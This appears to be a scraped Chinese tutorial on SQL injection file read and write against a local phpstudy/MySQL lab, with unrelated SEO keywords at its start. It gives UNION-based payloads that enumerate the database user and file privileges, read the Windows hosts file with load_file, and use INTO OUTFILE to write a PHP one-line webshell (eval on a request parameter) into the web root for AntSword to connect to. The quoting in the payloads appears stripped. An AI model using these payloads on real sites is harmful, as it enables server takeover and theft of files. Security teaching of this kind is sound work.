网站建设硬件,安徽省网站建设公司,企业客户管理系统,上海工程项目查询文章目录 条件利用SQL注入漏洞读取hosts文件查看文件读写权限安全选项允许导入导出读取hosts文件 利用SQL注入漏洞写入一句话木马#xff0c;并用蚁剑连接webshell写入文件 条件 SQL注入有直接SQL注入#xff0c;也有文件读写时的注入#xff0c;后者的主要 目的在于获取web… 文章目录 条件利用SQL注入漏洞读取hosts文件查看文件读写权限安全选项允许导入导出读取hosts文件 利用SQL注入漏洞写入一句话木马并用蚁剑连接webshell写入文件 条件 SQL注入有直接SQL注入也有文件读写时的注入后者的主要 目的在于获取webshell或盗取重要文件。 当前(连接)数据库的用户具有文件读写权限。已知读写目标文件的绝对路径。 web 应用在服务器上的绝对路径一般情况下是不知道的。 但是系统敏感文件的路径是固定的。 安全选项secure_file_priv允许导入导出操作。 secure_file_privnull不允许导入导出操作。 secure_file_priv目录名只允许此目录及子目录下导入导出操作。 secure_file_priv 不对导入导出操作做限制。 利用SQL注入漏洞读取hosts文件 查看文件读写权限 输入语句逐个查看当前用户查看到第三个用户发现他是root权限 ?id1 and 12 union select 1,user(),3 --输入语句查看用户的权限 ?id1 and 12 union select 1,file_priv,3 from mysql.user where userroot and hostlocalhost --查看后用户具有文件读写权限 安全选项允许导入导出 登录phpMyAdmin点击变量在搜索框中搜索priv可以看到下面的变量secure file priv的值为null 然后在phpstudy中打开配置文件 在mysqld中加入secure_file_priv保存 重启phpstudy并刷新phpMyAdmin页面搜索后发现发现变量secure file priv的值已经为空此时已修改成功 读取hosts文件 已知hosts文件的绝对路径是c:\windows\system32\drivers\etc\hosts输入下面的联合查询语句对hosts文件进行读取注意需要对路径中的\进行转义 ?id1 and 12 union select 1,2,load_file(c:\\windows\\system32\\drivers\\etc\\hosts) --读取成功 利用SQL注入漏洞写入一句话木马并用蚁剑连接webshell 写入文件 输入下面SQL语句在www目录下写入一个muma.php文件 ?id1 and 12 union select 1,?php eval($_REQUEST[777])?,3 into outfile c:\\phpstudy\\WWW\\muma.php --执行成功 写入的文件